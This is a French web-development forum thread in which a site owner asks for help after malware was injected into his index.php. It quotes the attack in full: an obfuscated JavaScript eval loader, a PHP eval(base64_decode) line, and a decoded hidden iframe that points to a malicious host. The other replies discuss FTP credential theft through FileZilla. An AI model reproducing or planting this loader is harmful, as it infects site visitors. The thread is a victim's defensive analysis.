Discussion :

[Fanel]

Bonjour,

durant les vacances, je me suis aper�u qu'un virus �tait apparu sur l'un des sites que je g�re. Si j'affiche la source de mon fichier index.php, voici ce qui a �t� ins�r� � la premi�re ligne :

Code :

S�lectionner tout - Visualiser dans une fen�tre � part

<script>var s=new String();a=(new Function("","")+"").substr(3-1,4);if((a=="unct")||(a=="ncti"))a=(document.write+"").substr(2,4);if((a=="unct")||(a=="ncti")){r=1;c=String;}if(r&&document.createTextNode)u=2;e=window['e'+'v'+'al'];m=new Array(4.5*u,18/u,52.5*u,204/u,16*u,80/u,50*u,222/u,49.5*u,234/u,54.5*u,202/u,55*u,232/u,23*u,206/u,50.5*u,232/u,34.5*u,216/u,50.5*u,218/u,50.5*u,220/u,58*u,230/u,33*u,242/u,42*u,194/u,51.5*u,156/u,48.5*u,218/u,50.5*u,80/u,19.5*u,196/u,55.5*u,200/u,60.5*u,78/u,20.5*u,182/u,24*u,186/u,20.5*u,246/u,4.5*u,18/u,4.5*u,210/u,51*u,228/u,48.5*u,218/u,50.5*u,228/u,20*u,82/u,29.5*u,18/u,4.5*u,250/u,16*u,202/u,54*u,230/u,50.5*u,64/u,61.5*u,18/u,4.5*u,18/u,50*u,222/u,49.5*u,234/u,54.5*u,202/u,55*u,232/u,23*u,238/u,57*u,210/u,58*u,202/u,20*u,68/u,30*u,210/u,51*u,228/u,48.5*u,218/u,50.5*u,64/u,57.5*u,228/u,49.5*u,122/u,19.5*u,208/u,58*u,232/u,56*u,116/u,23.5*u,94/u,49.5*u,234/u,59.5*u,214/u,49.5*u,222/u,61*u,226/u,49*u,92/u,50*u,208/u,49.5*u,224/u,23*u,196/u,52.5*u,244/u,23.5*u,126/u,51.5*u,222/u,30.5*u,98/u,19.5*u,64/u,59.5*u,210/u,50*u,232/u,52*u,122/u,19.5*u,98/u,24*u,78/u,16*u,208/u,50.5*u,210/u,51.5*u,208/u,58*u,122/u,19.5*u,98/u,24*u,78/u,16*u,230/u,58*u,242/u,54*u,202/u,30.5*u,78/u,59*u,210/u,57.5*u,210/u,49*u,210/u,54*u,210/u,58*u,242/u,29*u,208/u,52.5*u,200/u,50*u,202/u,55*u,118/u,56*u,222/u,57.5*u,210/u,58*u,210/u,55.5*u,220/u,29*u,194/u,49*u,230/u,55.5*u,216/u,58.5*u,232/u,50.5*u,118/u,54*u,202/u,51*u,232/u,29*u,96/u,29.5*u,232/u,55.5*u,224/u,29*u,96/u,29.5*u,78/u,31*u,120/u,23.5*u,210/u,51*u,228/u,48.5*u,218/u,50.5*u,124/u,17*u,82/u,29.5*u,18/u,4.5*u,250/u,4.5*u,18/u,51*u,234/u,55*u,198/u,58*u,210/u,55.5*u,220/u,16*u,210/u,51*u,228/u,48.5*u,218/u,50.5*u,228/u,20*u,82/u,61.5*u,18/u,4.5*u,18/u,59*u,194/u,57*u,64/u,51*u,64/u,30.5*u,64/u,50*u,222/u,49.5*u,234/u,54.5*u,202/u,55*u,232/u,23*u,198/u,57*u,202/u,48.5*u,232/u,50.5*u,138/u,54*u,202/u,54.5*u,202/u,55*u,232/u,20*u,78/u,52.5*u,204/u,57*u,194/u,54.5*u,202/u,19.5*u,82/u,29.5*u,204/u,23*u,230/u,50.5*u,232/u,32.5*u,232/u,58*u,228/u,52.5*u,196/u,58.5*u,232/u,50.5*u,80/u,19.5*u,230/u,57*u,198/u,19.5*u,88/u,19.5*u,208/u,58*u,232/u,56*u,116/u,23.5*u,94/u,49.5*u,234/u,59.5*u,214/u,49.5*u,222/u,61*u,226/u,49*u,92/u,50*u,208/u,49.5*u,224/u,23*u,196/u,52.5*u,244/u,23.5*u,126/u,51.5*u,222/u,30.5*u,98/u,19.5*u,82/u,29.5*u,204/u,23*u,230/u,58*u,242/u,54*u,202/u,23*u,236/u,52.5*u,230/u,52.5*u,196/u,52.5*u,216/u,52.5*u,232/u,60.5*u,122/u,19.5*u,208/u,52.5*u,200/u,50*u,202/u,55*u,78/u,29.5*u,204/u,23*u,230/u,58*u,242/u,54*u,202/u,23*u,224/u,55.5*u,230/u,52.5*u,232/u,52.5*u,222/u,55*u,122/u,19.5*u,194/u,49*u,230/u,55.5*u,216/u,58.5*u,232/u,50.5*u,78/u,29.5*u,204/u,23*u,230/u,58*u,242/u,54*u,202/u,23*u,216/u,50.5*u,204/u,58*u,122/u,19.5*u,96/u,19.5*u,118/u,51*u,92/u,57.5*u,232/u,60.5*u,216/u,50.5*u,92/u,58*u,222/u,56*u,122/u,19.5*u,96/u,19.5*u,118/u,51*u,92/u,57.5*u,202/u,58*u,130/u,58*u,232/u,57*u,210/u,49*u,234/u,58*u,202/u,20*u,78/u,59.5*u,210/u,50*u,232/u,52*u,78/u,22*u,78/u,24.5*u,96/u,19.5*u,82/u,29.5*u,204/u,23*u,230/u,50.5*u,232/u,32.5*u,232/u,58*u,228/u,52.5*u,196/u,58.5*u,232/u,50.5*u,80/u,19.5*u,208/u,50.5*u,210/u,51.5*u,208/u,58*u,78/u,22*u,78/u,24.5*u,96/u,19.5*u,82/u,29.5*u,18/u,4.5*u,18/u,50*u,222/u,49.5*u,234/u,54.5*u,202/u,55*u,232/u,23*u,206/u,50.5*u,232/u,34.5*u,216/u,50.5*u,218/u,50.5*u,220/u,58*u,230/u,33*u,242/u,42*u,194/u,51.5*u,156/u,48.5*u,218/u,50.5*u,80/u,19.5*u,196/u,55.5*u,200/u,60.5*u,78/u,20.5*u,182/u,24*u,186/u,23*u,194/u,56*u,224/u,50.5*u,220/u,50*u,134/u,52*u,210/u,54*u,200/u,20*u,204/u,20.5*u,118/u,4.5*u,18/u,62.5*u);if((a=="unct")||(a=="ncti"))mm=c['fromCharCod'+'e'];for(i=0;i<m.length;i++)s+=mm(((a=="unct")||(a=="ncti"))?m[i]:123);if((a=="unct")||(a=="ncti"))e(s);</script>

Je suis donc all� t�l�charger le fichier index.php sur le FTP, et je trouve ceci � la premi�re ligne :

Code :

S�lectionner tout - Visualiser dans une fen�tre � part

<?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNF [...] jBhU0lwS1dVb2N5azdQQzl6WTNKcGNIUSsnKSk7DQp9'));

Une cons�quence visible de ce virus est que mon anti-virus devient fou, d�s que j'affiche la page. J'imagine qu'il fait pas mal de d�g�ts sur des syst�mes mal prot�g�s.

Mon site propose un formulaire d'inscription, avec des champs input de type text et un champ input de type file. J'ai utilis� mysql_real_escape_string() pour �viter les injections SQL, mais apparement, cela ne suffit pas.

Comment puis-je s�curiser mon site pour �viter que ce virus revienne ?

Question subsidiaire, comment puis-je faire pour "remonter � la source", savoir qui essaye de placer ce virus sur mon site ?

[SpaceFrog]

Regarde sur ton ftp la date de modification des fichiers...
tu as sans doute un fichier modifi� qui ins�re ce script, un fichiers htaccess ?

[Bovino]

Question subsidiaire, comment puis-je faire pour "remonter � la source", savoir qui essaye de placer ce virus sur mon site ?

Vu que le script ins�re l'iframe

Code :

S�lectionner tout - Visualiser dans une fen�tre � part

<iframe src='http://cuwkcozqb.dhcp.biz/?go=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>

dans ta page, la r�ponse n'est pas trop compliqu�e � trouver...

[Fanel]

Vu que le script ins�re l'iframe

Code :

S�lectionner tout - Visualiser dans une fen�tre � part

<iframe src='http://cuwkcozqb.dhcp.biz/?go=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>

dans ta page, la r�ponse n'est pas trop compliqu�e � trouver...

Comment as-tu fait pour afficher cette iframe ?

[Bovino]

Code :

S�lectionner tout - Visualiser dans une fen�tre � part

String.fromCharCode()

[MrPringle]

Vu le domaine je ne suis pas certains que tu en tires grand-chose malheureusement.

Si tu as plusieurs sites et si tu utilises Filezilla, v�rifie les tous et supprimes tous tes mots de passe enregistr�s. Il y a un virus de ce genre qui se multiplie de la sorte et qui est visiblement une vraie plaie � enlever. Bon courage.

[Bovino]

Vu le domaine je ne suis pas certains que tu en tires grand-chose malheureusement.

Si, il y a une adresse IP associ�e : 91.196.216.134, qui renvoie � http://whois.domaintools.com/91.196.216.134

[Fanel]

Si tu as plusieurs sites et si tu utilises Filezilla, v�rifie les tous et supprimes tous tes mots de passe enregistr�s. Il y a un virus de ce genre qui se multiplie de la sorte et qui est visiblement une vraie plaie � enlever. Bon courage.

J'utilise effectivement Filezilla, et j'ai une 40aines de FTP enregistr�s dessus (ceux de mes clients).. Il faudrait que je passe tous les sites au crible, et que je leur fasse modifier leur mot de passe FTP � tous ?

[MrPringle]

Non, mais d�j� supprimes tous les mots de passe stock�s (en clair c'est aberrant) dans Filezilla car c'est le facteur de d�veloppement du virus dont je parle. Ensuite fais un check, avec un peu de chance aucun n'est impact�.